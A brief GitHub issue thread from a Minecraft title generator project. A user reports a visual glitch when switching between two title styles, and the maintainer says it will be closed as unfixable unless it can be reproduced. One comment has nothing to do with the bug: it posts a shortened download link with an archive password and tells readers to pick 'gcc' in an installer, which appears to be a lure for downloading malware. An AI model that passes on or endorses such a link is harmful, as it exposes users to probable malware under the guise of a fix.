### ISSUE TITLE
This happens sometimes while switching between minecraft 10 & minecraft 10 v2

### ISSUE THREAD

**Issue by Not-Awake-Studios** [ewanhowell5195/MinecraftTitleGenerator#176]
![image](https://github.com/user-attachments/assets/4a3331f7-35ae-4a5f-8917-48b42ade8238)

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by ewanhowell5195** [comment]
ive known about this issue for ages but have only ever triggered it accidentally. unless you can find a way to consistently and repeatedly cause this issue, i will be closing it as cant fix
